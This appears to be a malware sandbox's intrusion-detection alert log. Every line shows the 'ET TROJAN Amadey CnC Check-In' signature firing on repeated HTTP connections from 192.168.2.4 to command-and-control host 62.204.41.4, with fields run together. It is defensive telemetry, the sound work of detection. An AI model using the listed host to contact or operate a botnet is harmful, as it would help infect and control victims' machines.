                            192.168.2.462.204.41.449746802027700 02/08/23-17:37:39.277464TCP2027700ET TROJAN Amadey CnC Check-In4974680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450013802027700 02/08/23-17:38:59.416856TCP2027700ET TROJAN Amadey CnC Check-In5001380192.168.2.462.204.41.4
                            192.168.2.462.204.41.450074802027700 02/08/23-17:39:14.260435TCP2027700ET TROJAN Amadey CnC Check-In5007480192.168.2.462.204.41.4
                            192.168.2.462.204.41.449918802027700 02/08/23-17:38:29.354200TCP2027700ET TROJAN Amadey CnC Check-In4991880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450246802027700 02/08/23-17:39:58.556275TCP2027700ET TROJAN Amadey CnC Check-In5024680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450267802027700 02/08/23-17:40:03.678070TCP2027700ET TROJAN Amadey CnC Check-In5026780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449970802027700 02/08/23-17:38:46.821273TCP2027700ET TROJAN Amadey CnC Check-In4997080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450218802027700 02/08/23-17:39:51.780000TCP2027700ET TROJAN Amadey CnC Check-In5021880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450184802027700 02/08/23-17:39:43.643716TCP2027700ET TROJAN Amadey CnC Check-In5018480192.168.2.462.204.41.4
                            192.168.2.462.204.41.449954802027700 02/08/23-17:38:39.826367TCP2027700ET TROJAN Amadey CnC Check-In4995480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450282802027700 02/08/23-17:40:07.406029TCP2027700ET TROJAN Amadey CnC Check-In5028280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450111802027700 02/08/23-17:39:23.277592TCP2027700ET TROJAN Amadey CnC Check-In5011180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449856802027700 02/08/23-17:38:12.965502TCP2027700ET TROJAN Amadey CnC Check-In4985680192.168.2.462.204.41.4
                            192.168.2.462.204.41.449700802027700 02/08/23-17:37:25.618450TCP2027700ET TROJAN Amadey CnC Check-In4970080192.168.2.462.204.41.4
                            192.168.2.462.204.41.449939802027700 02/08/23-17:38:36.225912TCP2027700ET TROJAN Amadey CnC Check-In4993980192.168.2.462.204.41.4
                            192.168.2.462.204.41.449851802027700 02/08/23-17:38:10.567171TCP2027700ET TROJAN Amadey CnC Check-In4985180192.168.2.462.204.41.4
                            192.168.2.462.204.41.450221802027700 02/08/23-17:39:52.520097TCP2027700ET TROJAN Amadey CnC Check-In5022180192.168.2.462.204.41.4
                            192.168.2.462.204.41.450304802027700 02/08/23-17:40:12.743685TCP2027700ET TROJAN Amadey CnC Check-In5030480192.168.2.462.204.41.4
                            192.168.2.462.204.41.449848802027700 02/08/23-17:38:09.783238TCP2027700ET TROJAN Amadey CnC Check-In4984880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450176802027700 02/08/23-17:39:39.790671TCP2027700ET TROJAN Amadey CnC Check-In5017680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450337802027700 02/08/23-17:40:23.085156TCP2027700ET TROJAN Amadey CnC Check-In5033780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450046802027700 02/08/23-17:39:07.465500TCP2027700ET TROJAN Amadey CnC Check-In5004680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450213802027700 02/08/23-17:39:50.554966TCP2027700ET TROJAN Amadey CnC Check-In5021380192.168.2.462.204.41.4
                            192.168.2.462.204.41.449889802027700 02/08/23-17:38:22.355002TCP2027700ET TROJAN Amadey CnC Check-In4988980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450005802027700 02/08/23-17:38:57.463506TCP2027700ET TROJAN Amadey CnC Check-In5000580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450254802027700 02/08/23-17:40:00.514767TCP2027700ET TROJAN Amadey CnC Check-In5025480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450259802027700 02/08/23-17:40:01.724392TCP2027700ET TROJAN Amadey CnC Check-In5025980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450000802027700 02/08/23-17:38:56.276223TCP2027700ET TROJAN Amadey CnC Check-In5000080192.168.2.462.204.41.4
                            192.168.2.462.204.41.449718802027700 02/08/23-17:37:30.060143TCP2027700ET TROJAN Amadey CnC Check-In4971880192.168.2.462.204.41.4
                            192.168.2.462.204.41.449967802027700 02/08/23-17:38:46.093677TCP2027700ET TROJAN Amadey CnC Check-In4996780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450295802027700 02/08/23-17:40:10.522022TCP2027700ET TROJAN Amadey CnC Check-In5029580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450041802027700 02/08/23-17:39:06.234295TCP2027700ET TROJAN Amadey CnC Check-In5004180192.168.2.462.204.41.4
                            192.168.2.462.204.41.450018802027700 02/08/23-17:39:00.633703TCP2027700ET TROJAN Amadey CnC Check-In5001880192.168.2.462.204.41.4
                            192.168.2.462.204.41.449713802027700 02/08/23-17:37:28.821552TCP2027700ET TROJAN Amadey CnC Check-In4971380192.168.2.462.204.41.4
                            192.168.2.462.204.41.449926802027700 02/08/23-17:38:31.519366TCP2027700ET TROJAN Amadey CnC Check-In4992680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450148802027700 02/08/23-17:39:32.593659TCP2027700ET TROJAN Amadey CnC Check-In5014880192.168.2.462.204.41.4
                            192.168.2.462.204.41.449754802027700 02/08/23-17:37:41.168561TCP2027700ET TROJAN Amadey CnC Check-In4975480192.168.2.462.204.41.4
                            192.168.2.462.204.41.449962802027700 02/08/23-17:38:41.870045TCP2027700ET TROJAN Amadey CnC Check-In4996280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450290802027700 02/08/23-17:40:09.328461TCP2027700ET TROJAN Amadey CnC Check-In5029080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450332802027700 02/08/23-17:40:21.859053TCP2027700ET TROJAN Amadey CnC Check-In5033280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450180802027700 02/08/23-17:39:42.064684TCP2027700ET TROJAN Amadey CnC Check-In5018080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450082802027700 02/08/23-17:39:16.214186TCP2027700ET TROJAN Amadey CnC Check-In5008280192.168.2.462.204.41.4
                            192.168.2.462.204.41.449876802027700 02/08/23-17:38:19.187751TCP2027700ET TROJAN Amadey CnC Check-In4987680192.168.2.462.204.41.4
                            192.168.2.462.204.41.449974802027700 02/08/23-17:38:47.760275TCP2027700ET TROJAN Amadey CnC Check-In4997480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450171802027700 02/08/23-17:39:38.199718TCP2027700ET TROJAN Amadey CnC Check-In5017180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449787802027700 02/08/23-17:37:49.088688TCP2027700ET TROJAN Amadey CnC Check-In4978780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449726802027700 02/08/23-17:37:33.198314TCP2027700ET TROJAN Amadey CnC Check-In4972680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450152802027700 02/08/23-17:39:33.546078TCP2027700ET TROJAN Amadey CnC Check-In5015280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450241802027700 02/08/23-17:39:57.341359TCP2027700ET TROJAN Amadey CnC Check-In5024180192.168.2.462.204.41.4
                            192.168.2.462.204.41.450250802027700 02/08/23-17:39:59.546506TCP2027700ET TROJAN Amadey CnC Check-In5025080192.168.2.462.204.41.4
                            192.168.2.462.204.41.449717802027700 02/08/23-17:37:29.811373TCP2027700ET TROJAN Amadey CnC Check-In4971780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449815802027700 02/08/23-17:37:58.137635TCP2027700ET TROJAN Amadey CnC Check-In4981580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450238802027700 02/08/23-17:39:56.593363TCP2027700ET TROJAN Amadey CnC Check-In5023880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450149802027700 02/08/23-17:39:32.825800TCP2027700ET TROJAN Amadey CnC Check-In5014980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450247802027700 02/08/23-17:39:58.822362TCP2027700ET TROJAN Amadey CnC Check-In5024780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450336802027700 02/08/23-17:40:22.842207TCP2027700ET TROJAN Amadey CnC Check-In5033680192.168.2.462.204.41.4
                            192.168.2.462.204.41.449816802027700 02/08/23-17:37:58.374846TCP2027700ET TROJAN Amadey CnC Check-In4981680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450078802027700 02/08/23-17:39:15.231604TCP2027700ET TROJAN Amadey CnC Check-In5007880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450311802027700 02/08/23-17:40:15.296990TCP2027700ET TROJAN Amadey CnC Check-In5031180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449905802027700 02/08/23-17:38:26.197219TCP2027700ET TROJAN Amadey CnC Check-In4990580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449946802027700 02/08/23-17:38:37.915361TCP2027700ET TROJAN Amadey CnC Check-In4994680192.168.2.462.204.41.4
                            192.168.2.462.204.41.449857802027700 02/08/23-17:38:13.235521TCP2027700ET TROJAN Amadey CnC Check-In4985780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449983802027700 02/08/23-17:38:50.645662TCP2027700ET TROJAN Amadey CnC Check-In4998380192.168.2.462.204.41.4
                            192.168.2.462.204.41.450168802027700 02/08/23-17:39:37.476154TCP2027700ET TROJAN Amadey CnC Check-In5016880192.168.2.462.204.41.4
                            192.168.2.462.204.41.449745802027700 02/08/23-17:37:39.033150TCP2027700ET TROJAN Amadey CnC Check-In4974580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450222802027700 02/08/23-17:39:52.771625TCP2027700ET TROJAN Amadey CnC Check-In5022280192.168.2.462.204.41.4
                            192.168.2.462.204.41.449999802027700 02/08/23-17:38:56.038686TCP2027700ET TROJAN Amadey CnC Check-In4999980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450009802027700 02/08/23-17:38:58.446402TCP2027700ET TROJAN Amadey CnC Check-In5000980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450275802027700 02/08/23-17:40:05.702720TCP2027700ET TROJAN Amadey CnC Check-In5027580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450317802027700 02/08/23-17:40:18.173072TCP2027700ET TROJAN Amadey CnC Check-In5031780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450079802027700 02/08/23-17:39:15.474751TCP2027700ET TROJAN Amadey CnC Check-In5007980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450151802027700 02/08/23-17:39:33.307816TCP2027700ET TROJAN Amadey CnC Check-In5015180192.168.2.462.204.41.4
                            192.168.2.462.204.41.450110802027700 02/08/23-17:39:23.028270TCP2027700ET TROJAN Amadey CnC Check-In5011080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450021802027700 02/08/23-17:39:01.371725TCP2027700ET TROJAN Amadey CnC Check-In5002180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449927802027700 02/08/23-17:38:32.329981TCP2027700ET TROJAN Amadey CnC Check-In4992780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450062802027700 02/08/23-17:39:11.394661TCP2027700ET TROJAN Amadey CnC Check-In5006280192.168.2.462.204.41.4
                            192.168.2.462.204.41.449933802027700 02/08/23-17:38:34.763685TCP2027700ET TROJAN Amadey CnC Check-In4993380192.168.2.462.204.41.4
                            192.168.2.462.204.41.449872802027700 02/08/23-17:38:18.196909TCP2027700ET TROJAN Amadey CnC Check-In4987280192.168.2.462.204.41.4
                            192.168.2.462.204.41.449942802027700 02/08/23-17:38:36.933202TCP2027700ET TROJAN Amadey CnC Check-In4994280192.168.2.462.204.41.4
                            192.168.2.462.204.41.449774802027700 02/08/23-17:37:45.979162TCP2027700ET TROJAN Amadey CnC Check-In4977480192.168.2.462.204.41.4
                            192.168.2.462.204.41.449844802027700 02/08/23-17:38:08.504141TCP2027700ET TROJAN Amadey CnC Check-In4984480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450025802027700 02/08/23-17:39:02.337619TCP2027700ET TROJAN Amadey CnC Check-In5002580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449863802027700 02/08/23-17:38:16.006053TCP2027700ET TROJAN Amadey CnC Check-In4986380192.168.2.462.204.41.4
                            192.168.2.462.204.41.449961802027700 02/08/23-17:38:41.634574TCP2027700ET TROJAN Amadey CnC Check-In4996180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449758802027700 02/08/23-17:37:42.136397TCP2027700ET TROJAN Amadey CnC Check-In4975880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450034802027700 02/08/23-17:39:04.545459TCP2027700ET TROJAN Amadey CnC Check-In5003480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450196802027700 02/08/23-17:39:46.473903TCP2027700ET TROJAN Amadey CnC Check-In5019680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450040802027700 02/08/23-17:39:05.994783TCP2027700ET TROJAN Amadey CnC Check-In5004080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450081802027700 02/08/23-17:39:15.969624TCP2027700ET TROJAN Amadey CnC Check-In5008180192.168.2.462.204.41.4
                            192.168.2.462.204.41.450288802027700 02/08/23-17:40:08.838915TCP2027700ET TROJAN Amadey CnC Check-In5028880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450294802027700 02/08/23-17:40:10.272901TCP2027700ET TROJAN Amadey CnC Check-In5029480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450123802027700 02/08/23-17:39:26.512749TCP2027700ET TROJAN Amadey CnC Check-In5012380192.168.2.462.204.41.4
                            192.168.2.462.204.41.450279802027700 02/08/23-17:40:06.686450TCP2027700ET TROJAN Amadey CnC Check-In5027980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450108802027700 02/08/23-17:39:22.559760TCP2027700ET TROJAN Amadey CnC Check-In5010880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450206802027700 02/08/23-17:39:48.861882TCP2027700ET TROJAN Amadey CnC Check-In5020680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450308802027700 02/08/23-17:40:13.941053TCP2027700ET TROJAN Amadey CnC Check-In5030880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450291802027700 02/08/23-17:40:09.560444TCP2027700ET TROJAN Amadey CnC Check-In5029180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449891802027700 02/08/23-17:38:22.836955TCP2027700ET TROJAN Amadey CnC Check-In4989180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449761802027700 02/08/23-17:37:42.845742TCP2027700ET TROJAN Amadey CnC Check-In4976180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449831802027700 02/08/23-17:38:01.970314TCP2027700ET TROJAN Amadey CnC Check-In4983180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449701802027700 02/08/23-17:37:25.852741TCP2027700ET TROJAN Amadey CnC Check-In4970180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449885802027700 02/08/23-17:38:21.385215TCP2027700ET TROJAN Amadey CnC Check-In4988580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449914802027700 02/08/23-17:38:28.388086TCP2027700ET TROJAN Amadey CnC Check-In4991480192.168.2.462.204.41.4
                            192.168.2.462.204.41.449955802027700 02/08/23-17:38:40.070472TCP2027700ET TROJAN Amadey CnC Check-In4995580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449996802027700 02/08/23-17:38:55.320994TCP2027700ET TROJAN Amadey CnC Check-In4999680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450266802027700 02/08/23-17:40:03.436704TCP2027700ET TROJAN Amadey CnC Check-In5026680192.168.2.462.204.41.4
                            192.168.2.462.204.41.449720802027700 02/08/23-17:37:30.557563TCP2027700ET TROJAN Amadey CnC Check-In4972080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450320802027700 02/08/23-17:40:18.911019TCP2027700ET TROJAN Amadey CnC Check-In5032080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450225802027700 02/08/23-17:39:53.481402TCP2027700ET TROJAN Amadey CnC Check-In5022580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450219802027700 02/08/23-17:39:52.017413TCP2027700ET TROJAN Amadey CnC Check-In5021980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450006802027700 02/08/23-17:38:57.717411TCP2027700ET TROJAN Amadey CnC Check-In5000680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450012802027700 02/08/23-17:38:59.182172TCP2027700ET TROJAN Amadey CnC Check-In5001280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450053802027700 02/08/23-17:39:09.121134TCP2027700ET TROJAN Amadey CnC Check-In5005380192.168.2.462.204.41.4
                            192.168.2.462.204.41.450177802027700 02/08/23-17:39:40.085027TCP2027700ET TROJAN Amadey CnC Check-In5017780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450136802027700 02/08/23-17:39:29.705547TCP2027700ET TROJAN Amadey CnC Check-In5013680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450281802027700 02/08/23-17:40:07.173251TCP2027700ET TROJAN Amadey CnC Check-In5028180192.168.2.462.204.41.4
                            192.168.2.462.204.41.450024802027700 02/08/23-17:39:02.100310TCP2027700ET TROJAN Amadey CnC Check-In5002480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450137802027700 02/08/23-17:39:29.950707TCP2027700ET TROJAN Amadey CnC Check-In5013780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450220802027700 02/08/23-17:39:52.269838TCP2027700ET TROJAN Amadey CnC Check-In5022080192.168.2.462.204.41.4
                            192.168.2.462.204.41.449714802027700 02/08/23-17:37:29.062382TCP2027700ET TROJAN Amadey CnC Check-In4971480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450042802027700 02/08/23-17:39:06.484997TCP2027700ET TROJAN Amadey CnC Check-In5004280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450119802027700 02/08/23-17:39:25.527748TCP2027700ET TROJAN Amadey CnC Check-In5011980192.168.2.462.204.41.4
                            192.168.2.462.204.41.449840802027700 02/08/23-17:38:07.481729TCP2027700ET TROJAN Amadey CnC Check-In4984080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450198802027700 02/08/23-17:39:46.952790TCP2027700ET TROJAN Amadey CnC Check-In5019880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450315802027700 02/08/23-17:40:17.704525TCP2027700ET TROJAN Amadey CnC Check-In5031580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449812802027700 02/08/23-17:37:57.432480TCP2027700ET TROJAN Amadey CnC Check-In4981280192.168.2.462.204.41.4
                            192.168.2.462.204.41.449729802027700 02/08/23-17:37:35.078277TCP2027700ET TROJAN Amadey CnC Check-In4972980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450155802027700 02/08/23-17:39:34.245100TCP2027700ET TROJAN Amadey CnC Check-In5015580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450070802027700 02/08/23-17:39:13.299293TCP2027700ET TROJAN Amadey CnC Check-In5007080192.168.2.462.204.41.4
                            192.168.2.462.204.41.449986802027700 02/08/23-17:38:51.969969TCP2027700ET TROJAN Amadey CnC Check-In4998680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450333802027700 02/08/23-17:40:22.114217TCP2027700ET TROJAN Amadey CnC Check-In5033380192.168.2.462.204.41.4
                            192.168.2.462.204.41.449981802027700 02/08/23-17:38:49.709877TCP2027700ET TROJAN Amadey CnC Check-In4998180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449907802027700 02/08/23-17:38:26.684813TCP2027700ET TROJAN Amadey CnC Check-In4990780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449785802027700 02/08/23-17:37:48.607664TCP2027700ET TROJAN Amadey CnC Check-In4978580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450253802027700 02/08/23-17:40:00.282450TCP2027700ET TROJAN Amadey CnC Check-In5025380192.168.2.462.204.41.4
                            192.168.2.462.204.41.449925802027700 02/08/23-17:38:31.225194TCP2027700ET TROJAN Amadey CnC Check-In4992580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450075802027700 02/08/23-17:39:14.493858TCP2027700ET TROJAN Amadey CnC Check-In5007580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450014802027700 02/08/23-17:38:59.675888TCP2027700ET TROJAN Amadey CnC Check-In5001480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450210802027700 02/08/23-17:39:49.826813TCP2027700ET TROJAN Amadey CnC Check-In5021080192.168.2.462.204.41.4
                            192.168.2.462.204.41.449917802027700 02/08/23-17:38:29.103690TCP2027700ET TROJAN Amadey CnC Check-In4991780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450109802027700 02/08/23-17:39:22.797984TCP2027700ET TROJAN Amadey CnC Check-In5010980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450305802027700 02/08/23-17:40:12.988863TCP2027700ET TROJAN Amadey CnC Check-In5030580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449830802027700 02/08/23-17:38:01.731970TCP2027700ET TROJAN Amadey CnC Check-In4983080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450193802027700 02/08/23-17:39:45.766476TCP2027700ET TROJAN Amadey CnC Check-In5019380192.168.2.462.204.41.4
                            192.168.2.462.204.41.449793802027700 02/08/23-17:37:50.723015TCP2027700ET TROJAN Amadey CnC Check-In4979380192.168.2.462.204.41.4
                            192.168.2.462.204.41.450032802027700 02/08/23-17:39:04.057616TCP2027700ET TROJAN Amadey CnC Check-In5003280192.168.2.462.204.41.4
                            192.168.2.462.204.41.449898802027700 02/08/23-17:38:24.505533TCP2027700ET TROJAN Amadey CnC Check-In4989880192.168.2.462.204.41.4
                            192.168.2.462.204.41.449752802027700 02/08/23-17:37:40.700038TCP2027700ET TROJAN Amadey CnC Check-In4975280192.168.2.462.204.41.4
                            192.168.2.462.204.41.449935802027700 02/08/23-17:38:35.242769TCP2027700ET TROJAN Amadey CnC Check-In4993580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449739802027700 02/08/23-17:37:37.573322TCP2027700ET TROJAN Amadey CnC Check-In4973980192.168.2.462.204.41.4
                            192.168.2.462.204.41.449971802027700 02/08/23-17:38:47.051646TCP2027700ET TROJAN Amadey CnC Check-In4997180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449958802027700 02/08/23-17:38:40.811347TCP2027700ET TROJAN Amadey CnC Check-In4995880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450080802027700 02/08/23-17:39:15.721319TCP2027700ET TROJAN Amadey CnC Check-In5008080192.168.2.462.204.41.4
                            192.168.2.462.204.41.449976802027700 02/08/23-17:38:48.242353TCP2027700ET TROJAN Amadey CnC Check-In4997680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450127802027700 02/08/23-17:39:27.463619TCP2027700ET TROJAN Amadey CnC Check-In5012780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449775802027700 02/08/23-17:37:46.222862TCP2027700ET TROJAN Amadey CnC Check-In4977580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449757802027700 02/08/23-17:37:41.898387TCP2027700ET TROJAN Amadey CnC Check-In4975780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449953802027700 02/08/23-17:38:39.587593TCP2027700ET TROJAN Amadey CnC Check-In4995380192.168.2.462.204.41.4
                            192.168.2.462.204.41.449795802027700 02/08/23-17:37:51.324909TCP2027700ET TROJAN Amadey CnC Check-In4979580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449798802027700 02/08/23-17:37:52.895060TCP2027700ET TROJAN Amadey CnC Check-In4979880192.168.2.462.204.41.4
                            192.168.2.462.204.41.449737802027700 02/08/23-17:37:37.044350TCP2027700ET TROJAN Amadey CnC Check-In4973780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450157802027700 02/08/23-17:39:34.733706TCP2027700ET TROJAN Amadey CnC Check-In5015780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449930802027700 02/08/23-17:38:33.757165TCP2027700ET TROJAN Amadey CnC Check-In4993080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450065802027700 02/08/23-17:39:12.112270TCP2027700ET TROJAN Amadey CnC Check-In5006580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449973802027700 02/08/23-17:38:47.525350TCP2027700ET TROJAN Amadey CnC Check-In4997380192.168.2.462.204.41.4
                            192.168.2.462.204.41.450200802027700 02/08/23-17:39:47.437016TCP2027700ET TROJAN Amadey CnC Check-In5020080192.168.2.462.204.41.4
                            192.168.2.462.204.41.449881802027700 02/08/23-17:38:20.412227TCP2027700ET TROJAN Amadey CnC Check-In4988180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449829802027700 02/08/23-17:38:01.495962TCP2027700ET TROJAN Amadey CnC Check-In4982980192.168.2.462.204.41.4
                            192.168.2.462.204.41.449875802027700 02/08/23-17:38:18.930672TCP2027700ET TROJAN Amadey CnC Check-In4987580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450133802027700 02/08/23-17:39:28.968381TCP2027700ET TROJAN Amadey CnC Check-In5013380192.168.2.462.204.41.4
                            192.168.2.462.204.41.450257802027700 02/08/23-17:40:01.251489TCP2027700ET TROJAN Amadey CnC Check-In5025780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450228802027700 02/08/23-17:39:54.186332TCP2027700ET TROJAN Amadey CnC Check-In5022880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450240802027700 02/08/23-17:39:57.100034TCP2027700ET TROJAN Amadey CnC Check-In5024080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450186802027700 02/08/23-17:39:44.122140TCP2027700ET TROJAN Amadey CnC Check-In5018680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450050802027700 02/08/23-17:39:08.417524TCP2027700ET TROJAN Amadey CnC Check-In5005080192.168.2.462.204.41.4
                            192.168.2.462.204.41.449780802027700 02/08/23-17:37:47.419949TCP2027700ET TROJAN Amadey CnC Check-In4978080192.168.2.462.204.41.4
                            192.168.2.462.204.41.449783802027700 02/08/23-17:37:48.137742TCP2027700ET TROJAN Amadey CnC Check-In4978380192.168.2.462.204.41.4
                            192.168.2.462.204.41.449749802027700 02/08/23-17:37:39.995475TCP2027700ET TROJAN Amadey CnC Check-In4974980192.168.2.462.204.41.4
                            192.168.2.462.204.41.449936802027700 02/08/23-17:38:35.483540TCP2027700ET TROJAN Amadey CnC Check-In4993680192.168.2.462.204.41.4
                            192.168.2.462.204.41.449838802027700 02/08/23-17:38:06.998531TCP2027700ET TROJAN Amadey CnC Check-In4983880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450028802027700 02/08/23-17:39:03.062795TCP2027700ET TROJAN Amadey CnC Check-In5002880192.168.2.462.204.41.4
                            192.168.2.462.204.41.449755802027700 02/08/23-17:37:41.418676TCP2027700ET TROJAN Amadey CnC Check-In4975580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449853802027700 02/08/23-17:38:11.209207TCP2027700ET TROJAN Amadey CnC Check-In4985380192.168.2.462.204.41.4
                            192.168.2.462.204.41.450212802027700 02/08/23-17:39:50.310671TCP2027700ET TROJAN Amadey CnC Check-In5021280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450285802027700 02/08/23-17:40:08.115127TCP2027700ET TROJAN Amadey CnC Check-In5028580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449847802027700 02/08/23-17:38:09.522560TCP2027700ET TROJAN Amadey CnC Check-In4984780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450120802027700 02/08/23-17:39:25.768549TCP2027700ET TROJAN Amadey CnC Check-In5012080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450203802027700 02/08/23-17:39:48.140900TCP2027700ET TROJAN Amadey CnC Check-In5020380192.168.2.462.204.41.4
                            192.168.2.462.204.41.450301802027700 02/08/23-17:40:11.986986TCP2027700ET TROJAN Amadey CnC Check-In5030180192.168.2.462.204.41.4
                            192.168.2.462.204.41.450019802027700 02/08/23-17:39:00.869717TCP2027700ET TROJAN Amadey CnC Check-In5001980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450031802027700 02/08/23-17:39:03.810410TCP2027700ET TROJAN Amadey CnC Check-In5003180192.168.2.462.204.41.4
                            192.168.2.462.204.41.450114802027700 02/08/23-17:39:23.997916TCP2027700ET TROJAN Amadey CnC Check-In5011480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450199802027700 02/08/23-17:39:47.192794TCP2027700ET TROJAN Amadey CnC Check-In5019980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450117802027700 02/08/23-17:39:24.763181TCP2027700ET TROJAN Amadey CnC Check-In5011780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449819802027700 02/08/23-17:37:59.122996TCP2027700ET TROJAN Amadey CnC Check-In4981980192.168.2.462.204.41.4
                            192.168.2.462.204.41.449908802027700 02/08/23-17:38:26.928554TCP2027700ET TROJAN Amadey CnC Check-In4990880192.168.2.462.204.41.4
                            192.168.2.462.204.41.449949802027700 02/08/23-17:38:38.632550TCP2027700ET TROJAN Amadey CnC Check-In4994980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450072802027700 02/08/23-17:39:13.789124TCP2027700ET TROJAN Amadey CnC Check-In5007280192.168.2.462.204.41.4
                            192.168.2.462.204.41.449825802027700 02/08/23-17:38:00.530244TCP2027700ET TROJAN Amadey CnC Check-In4982580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449920802027700 02/08/23-17:38:29.819519TCP2027700ET TROJAN Amadey CnC Check-In4992080192.168.2.462.204.41.4
